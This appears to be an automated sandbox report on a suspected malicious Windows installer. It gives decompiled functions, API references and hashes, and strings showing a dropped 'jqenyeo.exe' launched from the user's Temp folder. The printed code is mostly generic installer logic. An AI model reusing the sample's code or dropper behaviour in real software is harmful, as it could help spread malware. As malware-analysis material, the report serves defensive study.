                                                          • CloseClipboard.USER32 ref: 00405B8C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: H7B${
                                                          • API String ID: 590372296-2256286769
                                                          • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                          • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                          • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                          • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				long _v16;
                                                          				long _v20;
                                                          				long _v24;
                                                          				char _v28;
                                                          				intOrPtr _v32;
                                                          				long _v36;
                                                          				char _v40;
                                                          				unsigned int _v44;
                                                          				signed int _v48;
                                                          				WCHAR* _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				intOrPtr _v68;
                                                          				WCHAR* _v72;
                                                          				void _v76;
                                                          				struct HWND__* _v80;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr _t82;
                                                          				long _t87;
                                                          				short* _t89;
                                                          				void* _t95;
                                                          				signed int _t96;
                                                          				int _t109;
                                                          				signed short _t114;
                                                          				signed int _t118;
                                                          				struct HWND__** _t122;
                                                          				intOrPtr* _t138;
                                                          				WCHAR* _t146;
                                                          				unsigned int _t150;
                                                          				signed int _t152;
                                                          				unsigned int _t156;
                                                          				signed int _t158;
                                                          				signed int* _t159;
                                                          				signed int* _t160;
                                                          				struct HWND__* _t166;
                                                          				struct HWND__* _t167;
                                                          				int _t169;
                                                          				unsigned int _t197;
                                                          
                                                          				_t156 = __edx;
                                                          				_t82 =  *0x422720;
                                                          				_v32 = _t82;
                                                          				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                                          				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                          				if(_a8 == 0x40b) {
                                                          					E00405CAC(0x3fb, _t146);
                                                          					E004068EF(_t146);
                                                          				}
                                                          				_t167 = _a4;
                                                          				if(_a8 != 0x110) {
                                                          					L8:
                                                          					if(_a8 != 0x111) {
                                                          						L20:
                                                          						if(_a8 == 0x40f) {
                                                          							L22:
                                                          							_v8 = _v8 & 0x00000000;
                                                          							_v12 = _v12 & 0x00000000;
                                                          							E00405CAC(0x3fb, _t146);
                                                          							if(E0040603F(_t186, _t146) == 0) {
                                                          								_v8 = 1;
                                                          							}
                                                          							E00406668(0x421718, _t146);
                                                          							_t87 = E00406A35(1);
                                                          							_v16 = _t87;
                                                          							if(_t87 == 0) {
                                                          								L30:
                                                          								E00406668(0x421718, _t146);
                                                          								_t89 = E00405FE2(0x421718);
                                                          								_t158 = 0;
                                                          								if(_t89 != 0) {
                                                          									 *_t89 = 0;
                                                          								}
                                                          								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                          									goto L35;
                                                          								} else {
                                                          									_t169 = 0x400;
                                                          									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                          									asm("cdq");
                                                          									_v48 = _t109;
                                                          									_v44 = _t156;
                                                          									_v12 = 1;
                                                          									goto L36;
                                                          								}
                                                          							} else {
                                                          								_t159 = 0;
                                                          								if(0 == 0x421718) {
                                                          									goto L30;
                                                          								} else {
                                                          									goto L26;
                                                          								}
                                                          								while(1) {
                                                          									L26:
                                                          									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                                                          									if(_t114 != 0) {
                                                          										break;
                                                          									}
                                                          									if(_t159 != 0) {
                                                          										 *_t159 =  *_t159 & _t114;
                                                          									}
                                                          									_t160 = E00405F83(0x421718);
                                                          									 *_t160 =  *_t160 & 0x00000000;
                                                          									_t159 = _t160;
                                                          									 *_t159 = 0x5c;
                                                          									if(_t159 != 0x421718) {
                                                          										continue;
                                                          									} else {
                                                          										goto L30;
                                                          									}
                                                          								}
                                                          								_t150 = _v44;
                                                          								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                          								_v44 = _t150 >> 0xa;
                                                          								_v12 = 1;
                                                          								_t158 = 0;
                                                          								__eflags = 0;
                                                          								L35:
                                                          								_t169 = 0x400;
                                                          								L36:
                                                          								_t95 = E00404F52(5);
                                                          								if(_v12 != _t158) {
                                                          									_t197 = _v44;
                                                          									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                          										_v8 = 2;
                                                          									}
                                                          								}
                                                          								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                                                          									E00404F3A(0x3ff, 0xfffffffb, _t95);
                                                          									if(_v12 == _t158) {
                                                          										SetDlgItemTextW(_a4, _t169, 0x421708);
                                                          									} else {
                                                          										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                                                          									}
                                                          								}
                                                          								_t96 = _v8;
                                                          								 *0x42a304 = _t96;
                                                          								if(_t96 == _t158) {
                                                          									_v8 = E0040140B(7);
                                                          								}
                                                          								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                          									_v8 = _t158;
                                                          								}
                                                          								E004045E6(0 | _v8 == _t158);
                                                          								if(_v8 == _t158 &&  *0x423738 == _t158) {
                                                          									E00404A0E();
                                                          								}
                                                          								 *0x423738 = _t158;
                                                          								goto L53;
                                                          							}
                                                          						}
                                                          						_t186 = _a8 - 0x405;
                                                          						if(_a8 != 0x405) {
                                                          							goto L53;
                                                          						}
                                                          						goto L22;
                                                          					}
                                                          					_t118 = _a12 & 0x0000ffff;
                                                          					if(_t118 != 0x3fb) {
                                                          						L12:
                                                          						if(_t118 == 0x3e9) {
                                                          							_t152 = 7;
                                                          							memset( &_v76, 0, _t152 << 2);
                                                          							_v80 = _t167;
                                                          							_v72 = 0x423748;
                                                          							_v60 = E00404E0B;
                                                          							_v56 = _t146;
                                                          							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                                                          							_t122 =  &_v80;
                                                          							_v64 = 0x41;
                                                          							__imp__SHBrowseForFolderW(_t122);
                                                          							if(_t122 == 0) {
                                                          								_a8 = 0x40f;
                                                          							} else {
                                                          								__imp__CoTaskMemFree(_t122);
                                                          								E00405F37(_t146);
                                                          								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                                                          								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Temp") {
                                                          									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                                                          									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                                                          										lstrcatW(_t146, 0x428200);
                                                          									}
                                                          								}
                                                          								 *0x423738 =  *0x423738 + 1;
                                                          								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                          							}
                                                          						}
                                                          						goto L20;
                                                          					}
                                                          					if(_a12 >> 0x10 != 0x300) {
                                                          						goto L53;
                                                          					}
                                                          					_a8 = 0x40f;
                                                          					goto L12;
                                                          				} else {
                                                          					_t166 = GetDlgItem(_t167, 0x3fb);
                                                          					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                                                          						E00405F37(_t146);
                                                          					}
                                                          					 *0x429238 = _t167;
                                                          					SetWindowTextW(_t166, _t146);
                                                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                          					_push(1);
                                                          					E004045C4(_t167);
                                                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                          					_push(0x14);
                                                          					E004045C4(_t167);
                                                          					E004045F9(_t166);
                                                          					_t138 = E00406A35(8);
                                                          					if(_t138 == 0) {
                                                          						L53:
                                                          						return E0040462B(_a8, _a12, _a16);
                                                          					} else {
                                                          						 *_t138(_t166, 1);
                                                          						goto L8;
                                                          					}
                                                          				}
                                                          			}













































                                                          0x00404ab5
                                                          0x00404abb
                                                          0x00404ac1
                                                          0x00404ace
                                                          0x00404adc
                                                          0x00404adf
                                                          0x00404ae7
                                                          0x00404aed
                                                          0x00404aed
                                                          0x00404af9
                                                          0x00404afc
                                                          0x00404b6a
                                                          0x00404b71
                                                          0x00404c48
                                                          0x00404c4f
                                                          0x00404c5e
                                                          0x00404c5e
                                                          0x00404c62
                                                          0x00404c6c
                                                          0x00404c79
                                                          0x00404c7b
                                                          0x00404c7b
                                                          0x00404c89
                                                          0x00404c90
                                                          0x00404c97
                                                          0x00404c9a
                                                          0x00404cd6
                                                          0x00404cd8
                                                          0x00404cde
                                                          0x00404ce3
                                                          0x00404ce7
                                                          0x00404ce9
                                                          0x00404ce9
                                                          0x00404d05
                                                          0x00000000
                                                          0x00404d07
                                                          0x00404d0a
                                                          0x00404d18
                                                          0x00404d1e
                                                          0x00404d1f
                                                          0x00404d22
                                                          0x00404d25
                                                          0x00000000
                                                          0x00404d25
                                                          0x00404c9c
                                                          0x00404c9e
                                                          0x00404ca2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404ca4
                                                          0x00404ca4
                                                          0x00404cb1
                                                          0x00404cb6
                                                          0x00000000
                                                          0x00000000
                                                          0x00404cba
                                                          0x00404cbc
                                                          0x00404cbc
                                                          0x00404cc5
                                                          0x00404cc7
                                                          0x00404ccc
                                                          0x00404ccf
                                                          0x00404cd4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404cd4
                                                          0x00404d31
                                                          0x00404d3b
                                                          0x00404d3e
                                                          0x00404d41
                                                          0x00404d48
                                                          0x00404d48
                                                          0x00404d4a
                                                          0x00404d4a
                                                          0x00404d4f
                                                          0x00404d51
                                                          0x00404d59
                                                          0x00404d60
                                                          0x00404d62
                                                          0x00404d6d
                                                          0x00404d6d
                                                          0x00404d62
                                                          0x00404d7d
                                                          0x00404d87
                                                          0x00404d8f
                                                          0x00404daa
                                                          0x00404d91
                                                          0x00404d9a
                                                          0x00404d9a
                                                          0x00404d8f
                                                          0x00404daf
                                                          0x00404db4
                                                          0x00404db9
                                                          0x00404dc2
                                                          0x00404dc2
                                                          0x00404dcb
                                                          0x00404dcd
                                                          0x00404dcd
                                                          0x00404dd9
                                                          0x00404de1
                                                          0x00404deb
                                                          0x00404deb
                                                          0x00404df0
                                                          0x00000000
                                                          0x00404df0
                                                          0x00404c9a
                                                          0x00404c51
                                                          0x00404c58
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404c58
                                                          0x00404b77
                                                          0x00404b80
                                                          0x00404b9a
                                                          0x00404b9f
                                                          0x00404ba9
                                                          0x00404bb0
                                                          0x00404bbc
                                                          0x00404bbf
                                                          0x00404bc2
                                                          0x00404bc9
                                                          0x00404bd1
                                                          0x00404bd4
                                                          0x00404bd8
                                                          0x00404bdf
                                                          0x00404be7
                                                          0x00404c41
                                                          0x00404be9
                                                          0x00404bea
                                                          0x00404bf1
                                                          0x00404bfb
                                                          0x00404c03
                                                          0x00404c10
                                                          0x00404c24
                                                          0x00404c28
                                                          0x00404c28
                                                          0x00404c24
                                                          0x00404c2d
                                                          0x00404c3a
                                                          0x00404c3a
                                                          0x00404be7
                                                          0x00000000
                                                          0x00404b9f
                                                          0x00404b8d
                                                          0x00000000
                                                          0x00000000
                                                          0x00404b93
                                                          0x00000000
                                                          0x00404afe
                                                          0x00404b0b
                                                          0x00404b14
                                                          0x00404b21
                                                          0x00404b21
                                                          0x00404b28
                                                          0x00404b2e
                                                          0x00404b37
                                                          0x00404b3a
                                                          0x00404b3d
                                                          0x00404b45
                                                          0x00404b48
                                                          0x00404b4b
                                                          0x00404b51
                                                          0x00404b58
                                                          0x00404b5f
                                                          0x00404df6
                                                          0x00404e08
                                                          0x00404b65
                                                          0x00404b68
                                                          0x00000000
                                                          0x00404b68
                                                          0x00404b5f

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 00404B04
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00423748,00000000,?,?), ref: 00404C1C
                                                          • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk), ref: 00404C28
                                                          • SetDlgItemTextW.USER32 ref: 00404C3A
                                                            • Part of subcall function 00405CAC: GetDlgItemTextW.USER32 ref: 00405CBF
                                                            • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                            • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                            • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                            • Part of subcall function 004068EF: CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                          • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                            • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                            • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                            • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk$H7B
                                                          • API String ID: 2624150263-3447255429
                                                          • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                          • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                          • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                          • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 67%
                                                          			E004021AA() {
                                                          				signed int _t52;
                                                          				void* _t56;
                                                          				intOrPtr* _t60;
                                                          				intOrPtr _t61;
                                                          				intOrPtr* _t62;
                                                          				intOrPtr* _t64;
                                                          				intOrPtr* _t66;
                                                          				intOrPtr* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t72;
                                                          				intOrPtr* _t74;
                                                          				intOrPtr* _t76;
                                                          				intOrPtr* _t78;
                                                          				intOrPtr* _t80;
                                                          				void* _t83;
                                                          				intOrPtr* _t91;
                                                          				signed int _t101;
                                                          				signed int _t105;
                                                          				void* _t107;
                                                          
                                                          				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                          				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                          				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                          				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                          				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                          				_t52 =  *(_t107 - 0x20);
                                                          				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                          				_t101 = _t52 & 0x00008000;
                                                          				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                          				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                          				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                          					E00402DA6(0x21);
                                                          				}
                                                          				_t56 = _t107 + 8;
                                                          				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                                          				if(_t56 < _t83) {
                                                          					L14:
                                                          					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                          					_push(0xfffffff0);
                                                          				} else {
                                                          					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                          					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                                          					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                          					if(_t61 >= _t83) {
                                                          						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                          						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                          						if(_t101 == _t83) {
                                                          							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                          							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
                                                          						}
                                                          						if(_t105 != _t83) {
                                                          							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                          							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                          						}
                                                          						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                          						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                          						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                          						if( *_t91 != _t83) {
                                                          							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                          							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                          						}
                                                          						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                          						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                          						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                          						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                          						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                          							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                          							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                          						}
                                                          						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                          						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                          					}
                                                          					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                          					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                          					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                          						_push(0xfffffff4);
                                                          					} else {
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          				E00401423();
                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                                                          				return 0;
                                                          			}






















                                                          0x004021b3
                                                          0x004021bd
                                                          0x004021c7
                                                          0x004021d1
                                                          0x004021dc
                                                          0x004021df
                                                          0x004021f9
                                                          0x004021fc
                                                          0x00402202
                                                          0x00402205
                                                          0x0040220f
                                                          0x00402213
                                                          0x00402213
                                                          0x00402218
                                                          0x00402229
                                                          0x00402231
                                                          0x004022e8
                                                          0x004022e8
                                                          0x004022ef
                                                          0x00402237
                                                          0x00402237
                                                          0x00402246
                                                          0x0040224a
                                                          0x0040224d
                                                          0x00402253
                                                          0x00402261
                                                          0x00402264
                                                          0x00402266
                                                          0x00402271
                                                          0x00402271
                                                          0x00402276
                                                          0x00402278
                                                          0x0040227f
                                                          0x0040227f
                                                          0x00402282
                                                          0x0040228b
                                                          0x0040228e
                                                          0x00402294
                                                          0x00402296
                                                          0x004022a0
                                                          0x004022a0
                                                          0x004022a3
                                                          0x004022ac
                                                          0x004022af
                                                          0x004022b8
                                                          0x004022be
                                                          0x004022c0
                                                          0x004022ce
                                                          0x004022ce
                                                          0x004022d1
                                                          0x004022d7
                                                          0x004022d7
                                                          0x004022da
                                                          0x004022e0
                                                          0x004022e6
                                                          0x004022fb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004022e6
                                                          0x004022f1
                                                          0x00402c2d
                                                          0x00402c39

                                                          APIs
                                                          • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID:
                                                          • API String ID: 542301482-0
                                                          • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                          • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                          • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                          • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 39%
                                                          			E0040290B(short __ebx, short* __edi) {
                                                          				void* _t21;
                                                          
                                                          				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                          					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                          					_push(_t21 - 0x2b0);
                                                          					_push(__edi);
                                                          					E00406668();
                                                          				} else {
                                                          					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                          					 *__edi = __ebx;
                                                          					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                          				}
                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                          				return 0;
                                                          			}




                                                          0x00402923
                                                          0x0040293e
                                                          0x00402949
                                                          0x0040294a
                                                          0x00402a94
                                                          0x00402925
                                                          0x00402928
                                                          0x0040292b
                                                          0x0040292e
                                                          0x0040292e
                                                          0x00402c2d
                                                          0x00402c39

                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                          • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                          • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                          • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                          				struct HWND__* _v8;
                                                          				struct HWND__* _v12;
                                                          				long _v16;
                                                          				signed int _v20;
                                                          				signed int _v24;
                                                          				intOrPtr _v28;
                                                          				signed char* _v32;
                                                          				int _v36;
                                                          				signed int _v44;
                                                          				int _v48;
                                                          				signed int* _v60;
                                                          				signed char* _v64;
                                                          				signed int _v68;
                                                          				long _v72;
                                                          				void* _v76;
                                                          				intOrPtr _v80;
                                                          				intOrPtr _v84;
                                                          				void* _v88;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t198;
                                                          				intOrPtr _t201;
                                                          				long _t207;
                                                          				signed int _t211;
                                                          				signed int _t222;
                                                          				void* _t225;
                                                          				void* _t226;
                                                          				int _t232;
                                                          				long _t237;
                                                          				long _t238;
                                                          				signed int _t239;
                                                          				signed int _t245;
                                                          				signed int _t247;
                                                          				signed char _t248;
                                                          				signed char _t254;
                                                          				void* _t258;
                                                          				void* _t260;
